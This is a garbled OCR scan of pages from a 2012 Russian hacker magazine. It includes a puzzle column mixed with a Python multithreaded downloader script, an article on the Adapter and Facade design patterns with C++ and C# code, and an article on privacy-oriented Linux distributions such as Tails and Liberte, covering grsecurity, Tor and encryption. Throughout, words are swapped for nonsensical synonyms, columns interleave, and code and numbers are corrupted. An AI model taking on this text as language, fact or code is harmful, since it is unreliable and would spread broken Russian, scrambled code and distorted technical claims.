файлов значения безграмотный имеют. Для реализации многопоточности использо вать в подбор по части дн у изо стандартных библиотек thгeadiпg , eveпtlet, geveпt,

Twisted

либо любую другую з получай комую тебе библио ­

Итого имеем: ради ту лампочку, которая горит, отвечает токмо который

привнесенный рубильник !второй]. Трогаем выключен ны е лампоч­ ки. Теплая лам поч ка включается от п омощью первого выключат еля .

теку.

А та, которая безграмотный г относительно рит равно хо л в рассуждении дная , - не без; поддержка ю третьего.

РЕШЕНИЕ Я никак не стал особняком козырять равным образом реализовал скрипт со использо во а­

УСЛОВИЕ

нием дирекцион дартн ой thгeadiпg:

В одной бутылке литр вина, на др угой литр воды. Из первой кайфовый вторую перелили ложку первопричина , а по времени с второстепенный во п ервую перелили ложку

import import import import

получившейся смеси. Чего тепер ь больше: воды на бутылке не без; вином

sys threading Queue urllib2

alias проступок на бутылке не без; водой? Вино равным образом вод у безграмотный перемешивали.

РЕШЕНИЕ Для большей наглядности возьмем ложку вмещающий

#

Класс

потока,

скачивающий

страницу

class DownloadThread(threading . Thread): def run(self): #

Прописываем хидеры к

headers

=

I

=

000

мл

корень зла

0еее мл воды

+

0ее мл причина

I

бутылка:

000

II

бутылка:

0еее мл воды

мл

инструмент

+ 0ее мл смеси + 0ее мл причина -

0еемл смеси

страницы

urllib2.Request(urlsPool .get(),None,headers)

Пишем на индивидуальный обложка

Выдаем справку,

После второго переливания:

б.е)' }

logfile.write(urllib2.urlopen(req).read()) logfile . close() #

П о­

{ 'User-Agent' :

Запрашиваем предмет

req #

бутылка:

п бутылка:

запроса

'Мozilla /4 . 0 (compatiЫe; МSIE 0.0; Windows NT while urlsPool.qsize() > е : logfile=open(str(urlsPool.qsize()), ' w' )

#

000 мл.

сле первого переливания имеем:

разве скрипт запущен минуя аргументов

П олучается, ч в таком случае во смеси 00 частей воды равным образом 0 деление источник тож же 100/11 мл инструмент да 0000/11 мл воды . С учетом сего перепишем послед­

нее отображение !позволю себя убрат ь «МЛ» на большей компак т­ ности ]:

I

бутылка:

if len(sys.argv) < 0: print 'Usage : downloader.py [-n <number >] FILE \ n\ "- n <number>" - number of threads (default 00)' sys.exit( 0)

п бутылка:

I

бутылка:

#

II

бутылка:

Обрабатываем правдоподобный соображение со

численностью nотоков

if len(sys.argv)==4 and sys.argv[ 0] threads int(sys.argv[ 0]) else : threads 10

==

(9ее (1еее

+ 000/ 01) первопричина + 0000/ 01 воды - 0000/ 01) воды+ (1ее - 00/ 01)

источник

П осчитаем дроби:

009,09 909,09

преступление

первопричина

+ 00,91 + 00,91

воды

воды

'-n ' : Как видно, соединение на бу страна ках оди н ако вая ! Но зто позволено бы ло понять да незначительно элементарнее : подумай, чай масштаб жи д кос т равно на бу территория ках в итоге остался одинаковым - по части дин литр, а значит, равным образом самочки смеси

должны бытийствовать одинаковыми. ::Х:

ХАКЕР

03 /158/ 0012

099


КОДИНГ

МЕНЯЕМ

ИНТЕРФЕЙСЫ КЛАССОВ БЕЗ УЩЕРБА ДЛЯ ЗДОРОВЬЯ

deeonis [deeonislagmail.com[ ·

а во ай представ им, ч т относительно сколько-нибудь планирование отступать да мы из тобой написали

определённый парсер, тот или другой собирает опре д е л е нн ую инфор­ мацию из нужных сайтов. Дляп арсинга НТМL- стра н да ц мы использовали стороннюю библиотеку, ко ведь раиса тут в отношении тл ично справлялась со своими задачами. Но в т п рошло некоторое время, и от т арый заказчик, про которого ты да я соз д или н а ш чуд насчёт -п ро д укт, ре ­

шил напомни т ь об себя да согласно п росил до самого бавить парочку-другую н что касается ваша милость х функций . Мы вместе с задором взялись ради работу, да совершенно махом по­ няли, в чем дело? дворец книги интересах разбора НТ М L- ко д а еще д ав да усишко т аре л а и безвыгодный поддерживается. Зато на открытом доступе вкушать своего рода со кучей свистелок равным образом блестяшек, который-нибудь для тому но работает быстрее да вместе с т а­ бильнее. Н по отношению глотать одна проблема- ан т ерфейсы у классо во нов ой

Разработка равным образом подспорье большинства систем

библиотеки п ол н остью отличаю т ся ото тех, которые м ы использо­ вали ранее. Более того, есть такие методы от та рого НТМL-дв ижка

повелось во поток многих лет. Кодовая основание

малограмотный имеют анало г ов во новом. Нет, выработать ч т в отношении -т в отношении п одобное можно,

растет наравне держи дрожжах, а взаимосвязи в обществе

отбутузить произведение их работы. Всё сие получи на касательно дит сверху мысль, ч т что до

компонентами программнога обеспечения

подложить способности у новы х фич если т невыгодный та для п росто, в духе получи и распишись м сие показа­

становятся всё сложнее да изощреннее. Зачастую при обновлении отдельных участков заключение преддверие

программистами встает геморрой рефакторинга всего проекта до дна . Для того с тем этого избежать, создан паттерн « Адаптер», в отношении котором мы теперича да поговорим .

000

так ради сего н ужно породить порядочно функций равно безошибочно

сохатый вначале. Однако, в такой мере что наша сестра п роек т ирова ли наше прил ожение в 00 -стиле, нам держи воспособление придет паттерн <<Ада пт ер», ко т орый избавит нас ото переписывания кучи старого стих .

ПАТТЕРН «АДАПТЕР» Чтобы разгадать , вроде работает выше- мессия ный паттерн, до­

статочно продемонстрировать какой- н ибуд ь п ерехо пора к, например, для элек т ро пр иборов с С Ш А, кой п вал на в рассуждении ля е т вогнать ш татовскую вилку на е вр опейскую розетку . Пр ограммный трансформатор д е ла ет при-

ХАКЕР

03/158/2012


Паттерны «Адаптер>> да «Фасад>>

мерно в таком случае а . А разве конкретнее, ведь возлюбленный преобразует единственный интерфейс

puЬlic

IHTMLParser

вызова во остальной . Единственная его замысел - учинить так, чтобы клиент отнюдь не заметил, который симпатия обращается ничуть ко дру г ой библиоте­ ке, да тем самым избежать трудоемкой да на какой-то степени пусть даже

private : ModernHTMLParser &m_modernParser;

опасной процедуры изменения кода.

puЫic :

Д ля начатки давайте взглянем держи то, зачем у н воздушный ас было раньше.

HTMLAdapter(Modern HTMLParser &parser) { m_modernParser=parser;

Наша програ~а на первой версии (используется устаревшая библиоте ко а в целях парсинга

0/

HTML)

}

Интерфейс парсера

char * get Tags() {

01 . ..

class IHTMLParser

m_modern Parser.getHtmlTags();

{

01 . .•

01 char * getтags ()

};

е·

'

01 ...

/1

}

/1

Класс,

р еализующий

class HTMLP arse r :

равным образом нт ерфейс

puЫic

/ / Кл ие нт ский код ModernHTMLParser &modernParser=new ModernHTM LParser(); I HTMLParser * parser=new HTMLAdapter(modernP arser); parser->getTags();

IHTMLP arser

01 char * getTags() // Р еализация

метояа

Клиентский адрес невыгодный претерпит по существу никаких изменений.

};

Н у, аль что-нибудь придется разбудить вещь класса HT M L Adapteг равно пере­

01 } // Клиентский код IHTMLParser *parser parser->getTags();

наградить ему во качестве параметра ссылку держи Моdегп НТ МL Р агsег. Используя композицию,тоестьпередаваяобъектадаптируемого класса до ссылке, ты да я повышаем общую эластичность системы .

new HTM LParser();

В общем случае адрес адаптера может преображать результа­ ты, получаемые ото адаnтируемого класса. Так, если, например, ме­

Как автор видим, тогда всё достаточно просто. Е сть какой-то группировка

тод getТagsll класса НТМ L Рагsег возвращает конгломерат НТ М L-тегов,

Н Т МL Р агsег, реал да зующий соответст во ующий интерфейс. Клиент­

используемых на разметке страницы, а ме т од get Htm iTagsl l класса

ский адрес создает объек т, ко т орый поддерживает э т насчёт т ан т ерфейс,

ModeгnHTMLPaгseг возвращаеттоже самое, только на виде вектора, в таком случае

а впоследствии обращается для его разнообразным методам. Но в настоящий момент

выполнение метода getТags во HTM L Adapteг создаст сосредоточение возьми осно­

у нас очищать ModeгnHTMLPaгseг, кто хоть твоя милость ась? хочешь неграмотный поддерживает

ве полученного ото новой библиотеки вектора.

IHTM L Paгseг. Д ля того воеже поправить таковой недочет, автор сих строк создадим класс, кто довольно содействовать IHTMLPaгseг, присутствие этом деле г и­

Изменение результатов работы адаптируемого класса

руя создавание его методов н овой библиотеке . Этот новомодный характеристический показатель

class HTMLAdapter (Moder nHTMLP ar ser &parser): puЫic I HTMLParser

истанет а д а п тером.

Адаптер чтобы

ModernHTMLParser class ModernHTML Parser

private : ModernHTMLParser &m_modern Parser; puЫic :

HTMLAdapter(ModernHTMLP arser &parser) { m_moder nP arser=parser;

01 std ::vect or <char *> getHtmlT ag s ();

01 . . .

char *

01

Адаптер,

р еализующий

I HTMLPa r ser class HTMLAaa pt er (Mode rnHTMLP arser &pa rs er):

CLIENT

getтags ()

0/ .. .

равным образом нтерфейс

vectorOfTa gs

m_modern Parser.getHt mlTags();

TARGET

0

+request!l

r_

0

Adaptee -> specificReqest []

0

ADAPTER

0

+request(]

0------

-

«ad aptee»

.. ADAPTEE

specificReqest 01

Д равным образом аграмма классов nаттерна « Адаnтер »

ХАКЕР

03/158/ 0012

001


КОДИНГ

// Преобразуем градиент во массив return vector2array(vectorOfTags);

char * getTags() { // Тут всё проще, таково в качестве кого автор наследуем технология getНtmlTags (),

};

/1

IJ

vectorOfTags=getHtmlTags();

Jl

ведь не грех затребовать его наnрямую

Преобразуем ве ко тор на конгломерат

return vector2array(vectorOfTags);

};

Е сли твоя милость постоянно заглядыв аеш ь на рубрику << Кодинг », то, на­

верное, помнишь др угой смахиваемый паттер н, а собственно « Де коратор>>.

Jl ...

На стержневой соображение воистину может показаться, что такое? за сути эти двойка шаблона объектно - ориентированного пр ограммирования Конечно, используя юниорат за композиции, наш брат теря­

идентичны. Но сверху самом дел е паттерн «А даптер >> служит про пре­

образования одного ан т ерфейса вызова во другой, во в таком случае пора в качестве кого

ем некотор ую пластика равно ограничиваем себя только что одним классом

« Декоратор >> призван мо ди фицировать результаты, выдаваемые

НТМLРагsег, да вместо получаем польза во производительности .

методами поддерживаемых классов.

Если бы пакет создавала мн ожес тво объек т ов HTML Adapteг и на полную калитку работала со его методами, то, используя трансформатор объ­

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ

ектов, ты да я бы тратили лишнюю кэш равным образом теряли срок присутствие вызове

Выше наша сестра рассмотрели приближенно называемый а дап тер объектов, ко т орый

его методов равно сохранении инкапсулированного НТМLРа гsег. С др у­

ада пти рует интерфейс п у т ем композиции соответствующего объ­

нееврей сто роны, когда бы у получи из бы л н екий ранг НТМLРагsег 0, какой

екта равным образом передачи ему н контия ны х вызовов. Н насчёт убирать пока что сам поверхность такого

бы в свой черед реализовывал интерфейс IH TMLPa гseг, нам пришлось бы

паттерна-это а даптер для ла ссов. В предпочтение с а дапт драчун объектов,

nисать к него новомодный код.

звукосниматель классов испол ь зует множественное наследова н ие, аюшки?

маленечко у прощает его реализацию равным образом уско ряет работу.

« ФАСАД » Теперь , от случая к случаю автор хоть куда разобрались на паттерне «А даптер >>, можно начать другим модель ом объектно-ориентированного

Адаnтер классов

class HTMLAdapter (): puЫic HTMLParser,

программирования подо названием «Фаса д >>. Технически « Фасад >> puЬlic

ModernHTMLParser

маловато нежели отличается ото «А даптера >> . Чтобы во этом убедиться, давай взглянем возьми код.

puЫic : Паттерн

using

Syз~em ;

namespace

«Фасад>>

class SystemClassl { void methodA() ;

Adap~e~

01 .. .

{

} class MainApp class SystemClass2

static void Main () (

void methodB();

01 Create adapter and place а request Target ~arget=new Adapter () ; target .Request (); 11 Wнt for user Console . Read ();

01 . ..

class

SystemClassЗ

{ void methodC ();

/J . ..

01 "Tarqet" class Target

class Facade (SystemClassl &scl, SystemClass2 &sc2, SystemClassЗ &sсЗ)

( puЬlic

virtual void Request ()

( Console . 0Jп.teLine ( "Called

Target

Requeзt()") ;

01 "lldapter"

private : SystemClassl &m_scl; SystemClass2 &m_sc2; SystemClassЗ &m_scЗ;

class Adapter : Target puЬlic :

(

private Adaptee adaptee=new Adaptee (); puЬlic

override void Request ( )

Facade(SystemClassl &scl , SystemClass2 &sc2, SystemClassЗ

(

01 PossiЫy do sоме othm· м:~rk 11 and then call Spec~f~cRequest adaptee . SpecificRequest ( );

01 "Addptee"

m_s cl m_sc2

scl; sc2;

m_ scз

sсЗ;

&sсЗ)

void method()

{ Пример стих nаттерна « Адаnтер» возьми С#

002

m_scl. methodA ();

ХАКЕР

03/158/2012


П а тт ер н ы <<А д а пт е р » да << Ф аса д »

All the complexity of this entire sub-system is encapsulated in а single wrapper class and it's simple interface ------------------т------------------

SubsystemOne SubsystemTwoWгappeг

+primeTheDirectivell

SubsystemThгee

/

Holodeck

PlasmaConduit

WагрСоге

JeffeгiesTube

0 DilithiumChambeг

Weapon

t Тгаnsрогtег

TuгboLift

PhaseгBack

PhotonToгpedo

Диаграмма классов паттерна ссФасад•>

m_sc2 . met hodB() ; m_sc 0. meth odC () ;

стему . <<Фасад>> а инкапсупирует целое сии поступки во одном своем методе, сколько сво д ит всю процедуру для вызову одной-единственной функции равно тем самым упрощает клиенту век . Е сли прово д ить

'

аналогию не без; П К , в таком случае <<Фаса д >> - сие пуговка включения ноу т бука.

}

Более того, п а тт ерн <<Фаса д >> позволяет клиенту обращаться Класс

Fa cade,

таково а вроде да HT M L A d a p te г, п ринимае т на каче ­

ко любому классу сис т емы нате п рямую, получи и распишись низком уров н е, благода­

стве движение р аметров своего конструктора ссылки получи объекты. Только,

ря чему сохраняется весь покладистость да мощь сих классо во . О д вдоволь

на знак с <<Адаптера>>, сих ссылок неско ль ко . Д алее <<Фасад>>

ко, когда заборщик знает только лишь интерфейс <<Фасада>>, на будущем

определяе т н есколько ме т в отношении д насчёт на , ко т орые обращаются для функциям

наша сестра можем изменить систему классов, обслуживаемых

инкапсулиро на анных объекто на . Всё просто-напросто равным образом оче н ь очень может быть получи п ат­

Facade,

терн <<А д аптер>> . Н по отношению ц ели у сих д вух ш абло н ов соверше нн в отношении разные.

полезна.

да рядом этом далеко не обмениваться адрес клиента . Такая изолирование ужас

Если НТ М LР а г sе г п р е д назна ч е н про п ри во е д е н ия од н ого интерфей­ са для другому, в таком случае

Facade

у п ро щ ает интерфейс доступа для безвыгодный которой

ЗАКЛЮЧЕНИЕ

системе классов . В близ на еденном перед этим примере пишущий сии строки инка псулируем

Мы узнали об д вух новых паттернах: <<А д аптере>> равным образом <<Фаса -

вмиг сколько-нибудь объектов, принадлежащих ко разным типам равным образом со­

де>>. Первый позволяет свободно дать толчок равно н терфейс

ставляющих известный укомплектование ко л ассов, кой служит в целях выполне ­

одного класса ко интерфейсу д руго г об пользу кого быстрой адаптации

ния каких-либо опре д е л енных д ейс т вий . Ч тоб ы полегче себя сие

клиентского стих ко новым компоне н с годами системы. Ш аблон

п ре д ста во равным образом т ь, д остаточно вс п ом н ить ста р ый д обрый П К от систем­

00- п ро г рамми р ования <<Фаса д >>, бог п охожий н а <<А д а п тер>>,

ным блоком, монитором, танец н ками равным образом прочей периферией. Дл ваш покорный слуга

служит в целях целиком иной цели - у п ро щ ения д оступа

запуска сего компьютера нам нуж н касательно нажат ь кнопку питания держи си­

для определенным интерфейсам.

стемном блоке, включит ь монитор, колонки да т. д., так глотать породить

много функций классов, которые вкупе образуют некую си-

ХАКЕР

03/158/2012

В мире объектного кодингасуществует снова мно г что касается разнообраз ­ ных паттернов, в рассуждении которых автор этих строк расскажу во будущем. :х:

003


UNIXOID

Евгеньюшка Зобнин [ e xe cЬit. r u l

изоляцию ИЗ ЧЕГО СОСТОЯТ БЕЗОПАСНЫЕ LINUХ­ ДИСТРИБУТИВЫ Когда голос заходит касательно создании операционки, способной защитить неизвестность пребывания

-

Разработчики безопасных дис т рибутивов избегают использовать

ТгuеСгур t, что-то около во вкусе

его разработка ведется возьми ба з е за для рытой модели, из-за в чем дело? прочертить

исчерпывающий аудит кода не мочь .

Во период каждой

во Сети, тревога сохраненных держи диске

загрузки Наvеп

данных равным образом отдать оставшиеся ресурсы

« года •)

проверяет

защиты , дистрибутивастроители оказываются

дистрибутива в дня х, прошедших

от момента

получай изумление плодовитыми держи идеи

установки .

равно неординарные решения парнями . Эти м

Разработчики не рекомендуют

утилизировать

разработкам, простым равным образом сложным , гениальным

дистрибутив,

равно спорным, да посвящена данная статья.

ДОСТИГ

малолетства которого

000 ДНеЙ .

l:iфl!lilillli

д истрибу т да ваша сестра по части т во злом щ иков , по отношению д а вр еме нн по части

М н огие хакеры, считаю щ ие себя эксперта-

п холм во по части л пишущий эти строки мы сохра н ит ь инструмент обство равным образом п ростоту во ис­

ми на без п асности сумме равным образом на ся, на свое времена

п что касается л ьзова н ии . Ч тобы никак не из-за п у та т ь чита т е л я, ваш покорнейший слуга

брались из-за созда н ие п о-нас т оящему защи щ ен ­

разбил э т равным образом т ех н ологии сверху пятерка групп :

ны х равным образом предлагающи х п олную неизвестный н отросток ОС.

заплатки , согласно умолчанию наличные в рассуждении жен н ые нате кер ­

которые действи т ельно показали общество у, держи сколько

нел.

способны. Не будем д елать н авевающий тоску

цен т рируемся нате самых гла вн ых т ех н ологиях в их арсенале , ко т орые н а д ежно ради щ да щ ают сии

да из-за п ут ы ван равно моя особа т ех, для т насчёт пытает из ваш покорный слуга е го получи и распишись й ти .

Защита д а н ны х . Описани е не без; в области вместе с обов , со п что до ­

Д есктоп. Н абор д осту п н ы х п риложений, а вдобавок методики , п рименяемые в целях защи т ы

Я д ерные д е л а, а точнеепатчии единожды л ичные

Многие с них потер п е л равно лёп , за всем тем безвыгодный ­

установленный исследование д ист р иб у ти во в отношении во , а скон ­

зуе наш брат х дл моя особа обез лич да на а н равно моя персона пользов а т е ля

через пос т оронних наблю д ате л ей .

Различные ан т ересн ы е фуй ш ки. Итак, окунемся на вселенная способности а н ои д а л ьной

мо щь ю которых дости г ает вместе с автор безопасност ь

секьюрности да рассмот р им сле д ую щ ие д ис­

сохра н е н утнапиштим возьми д иске /флешке равно н фо р ма ц ии .

т рибутивы : Ubuпt u Pг i v acy

Анонимиза ц ия .Н абортехноло г ий,испол ь-

Haven

P гoject,

Tails

Re mi x, Pгi v a tix, The Li nux.

равным образом L ibeгte

ХАКЕР

03/158/20 02


Свобода путем изоляцию

ЯДРЕНЫЙ ТУКС

дога приложения получи отдельной виртуальной

Чтобы изготовить туке со всей серьезностью безопас­

машине. Смысл такого перегруза заключается

утнапиштим ОСью, никак не привыкать минуя допиливания ядра,

во тотальном разделении приложений, где-то что-нибудь

а точнее, его патчин га на повышения общей

хоть ежели взломщику каким-то по мановению волшебной палочки удастся

стойкости ОС. Вотан изо традиционных методов,

нарастить близкие льготы прежде суперпользо­

используемых про успехи этой цели,

вателя равно вслед за гр узить на стержень личный код, уязвимым

заключается на наложении для стержень патч ей

будеттолько одно приложен равно е, круглым счетом как бы каждая

проекта gгsec:uгity. Они обеспечивают защиту

виртуальная автомашина работает по-под управлени­

с возможных вторжений вместе с через множе­

ем собственного ядра. Такой зубодробитель­

ства методов, середи которых интердикт перехода

ный род защиты используется на дистри­

сообразно ссылкам, далеко не принадлежащим пользовате­

бутиве

лю, вето чтения

была посвящена отдельная наказание !« Младенец

dmesg

про всех, кто такой безграмотный име­

ет прав гооt, дополнительные ограничения интересах

QubesOS,

которому на нашем журнале

от собой убийцы>>,

][_07_2010].

сhгооt-приложений, экзогамия чтения

/ргос, хэширование адресного пространства и стека ядра равным образом многое другое. Мы ранее писали

Процесс загрузки

Liberte

НЕДОСЯГАЕМЫЕ БАЙТЫ

насчёт gгsecuгity [статья <<Термоя дерный синтез»,

Защищенность личных данных пользовате­

опубликова нн ая во октябрьском номере вслед за

ля- сие вторая важная характерная черта лю-

на первый встречный минута позволено удалить, на результате

дело безопасной ОС. Многие дистрибутивы,

что такое? концепция вернется ко исходному послеуста­

предназначенные пользу кого анонимизации юзера

новочному состоянию.

0010

год], этак в чем дело? безграмотный буду повторяться. Обычно купно со gгsecuгity на систему

данных пользоват е ля отображение растет, так его

устанавливается до сей времени да РаХ, кой ограни­

во Сети, обеспечивают ее не без; через спосо-

чивает вход для страницам памяти процессов

ба, какой оператор изо известного анекдота

сверло инструментов про вместе с оздания зашифрован­

!например, делает раздел данных недоступ­

назвал бы ампутацией нен у жного органа .

ны х файлов равно каталогов . Чаще токмо интересах сего

ным пользу кого исполнения], аюшки? позволяет предохранить

Такие дистрибутивы распространяются на виде

системные процессы с многих ошибок пере­

LiveCD,

который, даже если буду чи установленным

Многие системы да включают во себя возьми ­

исп в рассуждении льзуется знатный инстр у блюститель порядка ТгuеСгурt с удобным графическим интерфейсом. Напри­

полнения буфера. Этот путь используется

сверху флешку, сохраняет постоянно способности пользова­

мер, некто входит во Наvеп l www.haven-pгoject . oгg ].

на Libeгte Liпux, какой построен получай основе

телок нате RАМ-диске , уничтожаемом кайфовый миг

Однако от времени до времени разработчики дистрибутивов

ядра Haгdened

перезагрузки.Спосо~ конечно, действенный,

прибегают ко больше изощренным решени-

да усердствовать аляповатый .

ям. Дистрибутив Pгivatix содержит на себя

Gentoo, сейчас

включающему

на себя что другой патча . Другой подходец заключается на использова­

нии системы

SELinux

тож АррАгmог вместе

Более забавный разночтение состоит вис­ пользовании шифрованного хранилища

инстр у блюститель закона шифрования съемных носителей UsbCгyptFoгmat равно утилиту в целях резервного

со двумя упомянутыми прежде патчами !или

нате базе ТгuеСгурt сиречь LUKS/dm-cгypt, которое

копирования шифрованных томов CгyptBackup

возмещение них, да сие глупость] . Эти системы

расшифровывается нет слов срок загрузки впоследствии

собственной разработки. В плане поддержки

принудительного контроля доступа позволя­

ввода пароля. Благодаря современным на­

прозрачного шифрования данных особенно

корма швырять приложения на изолированном

работкам провести в жизнь такую систему адски

окружении, где-то что-то нарушение !читай взлом] одного

просто, тем больше что-то возлюбленная во готовом виде

примечателен дистрибутив Ubuntu Pгivacy Remix lwww. pг i vacy-cd . oгg ], сфабрикованный про

изо них безвыгодный повлечет вслед за на лицо проблем во других.

присутствует во дистрибутивах

работы на локальном окружении, безо доступа

Подход не без; использованием АррАгmог реализо­

равно многих других . Она равным образом нет переводу на дис­

для путы lзадействование LAN/WLAN/Biuetooth

ван во операционке

трибутивах

запрещено]. В его арсенале нет перевода фронт-энд

явлениям ее создателей, гарантирует полную

TailsiThe Amnesiac lncognito Live System] равно Libeгte Linux, притом во последнем

изоляцию приложений дружище с друга.

во качестве хранилища используется крипто­

руемый со

ванный представление диска, находящийся на отдель­

кодирование , учреждать подписи равным образом генери­

ном каталоге. По мере журнал во него личных

ровать ключи от через контекстного разблюдовка

quantOS,

которая, по части за­

Еще сильнее действенный поездка заключается в применении гипервизоров с целью запуска каж-

Ubuntu,

Fedoгa

собственной разработки ради

Nautilus

GnuPG,

интегри­

равно позволяющий приводить в исполнение

lв Наvеп те а функции выполняет сбруя

Seahoгse]. Также дистрибутив использует так называемые расширенные ТгuеСгурt-тома

lв собственной терминологии авторов проекта] для сохранения данных, накопленных пользо­

вателем закачаешься миг работы !например, настройки приложений, словарик

OpenOffice,

ключи GпuPG

равно т. д.]. Всё сие работает бесспорно равным образом безграмотный требует каких-либо дополнительных действий со сто­ роны пользователя.

Кроме систем шифрования, дистрибути­

ваш брат могут содержать на себя вспомогательные инструменты, которые помогают таить

равным образом оборонить информацию ото посторонних. На­

пример, во сверток приложений Tails входит ин­ струмент МАТ l mat.boum . oгg ], какой удаляет метаданные иэ файлов различных форматов

!изображений, документов да т. д.], интересах того чтобы прибрать иэ них что бог на душу положит затрагивание об ав­

_

Remov.able media can Ье disco м ected now. Before dtsconnecting. make sure that any 0/0 activity on the device has stopped.

торе.

Haven

имеет до этих пор паче интересные воз­

можности, например, возлюбленный позволяет шифровать содержимое титьки обмена на одиночный клик, что можно утилизировать с целью быстрой передачи

Liberte Linux собственной nереоной

ХАКЕР

03/158/ 0012

малого объема данных [скопировал строку-

005


UNIXOID

Congratulations. Your browser is configured to use Tor. Pluse ntlar to the ~ COf" l'urther inform.~tion aЬout using anonymously.

Тог safaly.

You &re now

fnМ

to Ьrowse the ln temet

.....

-·-;",..-;.., _.,. _ _ ••••a.u.m.11

__ . ~

....

liiiЬ

...

::".:'~:.:"..:·~:" ~

-.II~~.....W...-..L!Iai..МU....J.J.iU8~~~11111.1W.

floiSI8ofll~llllrllo~ Doo .IIOitiaweWмe

0 ttrrl!w ' w--~

Рабочий верстак Haven 05

The Amnesiac lncognito Live System

нажал возьми пометка на трее- вставил на письмо).

механизмы равно может хватить его на случае сбоя или — или

плане

Менеджер файлов

за недосмотру разработчиков приложения.

всё, аюшки? лишь только дозволяется нарисовать , беспричинно равно как их

Nautilus,

поступающий на оный

но дистрибутив, оснащен плагином , тот или другой

П оэтому на Libeгte

Linu x применяется

видоизмененный

Ta ils,

на который-нибудь разработчики пихают

неграмотный смущает немаленький масштаб дистрибутива. На­

предназначен в целях << полного >> удаления файла

подход: всё-таки входящие во дистриб утив сетевые

пример, на него входит графичный фронт-энд

после контекстное меню. Перед удалением

приложения настраиваются возьми работу чрез Тог

с целью Тог-клиента

обложка забивается случайными данными, приблизительно почто

lприложения, н е умеющие коптеть вместе с прок-

Vidalia lwww.toгpгoject . oгg/ pгojects/vidalia l, кто позволяет запускать/

ни единолично механизм восстановления данных

си, запускаются со через обертки toгify), а

тормозить Тог-демон, просматривать

невыгодный сможет его найти.

реклама запрещает любые исходящие сое ­

часть прошедшего чрез Тог трафика,

динения. Та кая проект позволяет избежа ть наравне

мо н иторить имущество д емо бери равным образом т. д.

АНОНИМУСЫ ИДУТ

прибыль IР-адре са, т ак да установления внешних

Дистрибутив заключает во со ебя три расши­

Обеспечение анонимности пребыв ания

соединений на объезд Тог. Пр да этом разрешены

рения для того браузера Fiгe fox, обеспечиваю суп е

во интернете-третья важная свойство

лишь от л е д ую щишки е типы внешних соединений:

устойчивость веб-серфинга: увеличение

безопасного дистрибутива. Как равным образом на случае

DНСР-запросы равно Тог-соединения судален ­

из защитой данных, отдельные люди дистрибутивы

ными НТТР IS)-портами;

нате веб-странице жаркий контент небось

подходят для решению сего вопроса радикаль­

ответы в piпg близ ограничении их количе ­

JavaScгipt-кoдa,

но. Например, Ubuпtu Pг ivacy

ства на секунду;

FiгeGPG l getfiгegpg.oгg ), позволяющий при­

невыгодный позволяет вылезать во Сеть , на томик числе

созда нны е пользователем VРN-соедине н ия;

модифицировать gрg-операции ко любым элеме нт ам

чрез

соедине ния , инициированныеспециаль­

веб-страницы, как например , подписывать alias

ным <<небезопасным браузером», который-нибудь

зашифровывать нарезанный место текста;

удалена с ядра Liпu x, чт об позволяет пре­

используется в целях регистрации во точках

растягивание НТТР S Eveгywheгe lwww. eff.oгg/

вратить кусок пьютер на в таком роде бастион, некоторый

доступа.

Bluetooth

Remix

вместе

да пусть даже И К-модуля.

Поддержка лишь сего хозяйства специально

toгbuttoп, ко т орое блокирует содержащийся

Flash

равным образом т. д .; аппарат

дозволено пустить в дело ради спокойной работы с важными секре тными данными .

Др угое дело- дистри бутивы, на которых из­

П ере дава емые по части

DHCP способности

присутствие этом

очень урезаются, а перенос имени хоста,

равным образом

0Pv4LL блокируется.

Ч тобы обеспечит ь

первично предусмотрена на озможность выхода

ARP

на Сеть . В них анонимност ь обеспечивается

неофициальность работы на локальных да

Wi-Fi-

со через по всем статьям известного инструмента Тог,

ceтяx, применяются рандомизаторы МАе­

кто пробрасывает сцепление при помощи

адресов. В некоторых дистрибутивах они

уймища сетевых узло на , что-то около сколько его и концы в воду

дост у пны во виде опции, тем не менее на Lib eгte Liпux

оказываются важно спрятаны. В обычной

М АС-адрес генерируется подвижно кайфовый

ситуации Тог прикидывается стандартным

период загрузки.

WINDOWS При установке получи и распишись флешку дистрибутив

прокси, держи работу от которым подобает нас тро ить браузер да др угое ПО . Н относительно в духе бытовать во ситуа-

ОБМАНКА ДЛЯ ~ ПОЛЬЗОБАТЕЛЕИ

Наvеnnроделываетодининтересныйтрюк

СУРОВОЕ ЛИЦО

со таблицей разделов, по причине которому

ции, рано или поздно посредством Тог необ хо димо пробросить

Е сли басить что касается поль зовательском интерфейсе

ординарный юзер

ни капельки вс е сое динения , где-то так чтобы ни что до дн что касается

ди ст ри бутивов чтобы анонимусов, в таком случае з десь всё-таки

встретить систему возьми брелке. Дистрибутив создает

с них н е утек л что касается на Сеть обходным путем?

ужас пр озаично: из тандартны е сре ды Gпome,

доnолнительный nустой раздел размером

Д истрибутивы

Ta ils

равно На vеп решают эту

проблему жуть просто: стена пере­

LXD E другими словами Fluxbox,

подборка стандартных прило­

жений кажется Fiгefox,

claws-mail,

AЬiwoгd равным образом т. д.,

000

Windows

безграмотный сможет инда

Мб на начале адресного nространства,

а саму ОС равно пользовательское прогалина

направляет целое соединения возьми Тог-прокси,

крестик рыцарственный комбинация ПО для того ведения

размещает на следующих разделах .

минуя любые прибыль траф ика во осмотр

скрытой деятельности . Он-то нас равно интересует.

<< отнюдь не видип> прочие разделы, nозтому

<<анонимной сети». Однако исполнитель Libeгte

Н екоторые стандартные приложения с целью

Windows

nользователю nокажется, почто получи и распишись флешке

Liпu x предупреждает, ч т в рассуждении таковский ход тео­

безопасного времяпрепровождения пишущий сии строки поуже

ни ложки нет, а ее величина составляет

ретически небезопасен, приблизительно что , инициируя

рассмотрели на предыдущих разделах, по части дн ако

nущей убедительности на оный раздел не запрещается

переплетение традиционным п у т ем, прибавление

сверху них наличность интересных софтин, очевидно же,

набросать разных документов, а пользу кого отвлечения

получает информацию что касается внешн ем IР-адресе

безграмотный заканчивается . Особенно любпытен на э т ом

внимания- nорнографических картинок.

006

000

ХАКЕР

Мб . Для

03/158/2012


Свобода от изоляцию

https-eveгywhe гe l, принудительна переклю­ чающее браузер держи употребление протокола

Eile f.dit ~ew .Q.o jlookmarks Jools Y[indow J:!elp Г'

НТТРS, когда сайт его поддерживает.

Те но расширения идут во комплекте со дис­

NewTab

Back

трибутивом Наvеп, при всем том его боеприпасы ими не ограничивается. Здесь твоя милость найдешь бонус в виде пяти дополнительных полезных рас­

ширений: RefCoпtгol- производит спуфинг НТТР­ поля НТТР-геfеггег, скрывая отсайтов их

доноры, так снедать сайты, не без; которых произошел

Congratulations. You are using Tor.

переход.

CookieSafe- позволяет править уста­ новкой кукисов во браузер чтобы выбранных

Please refer to the Тог webs~e for

сайтов .

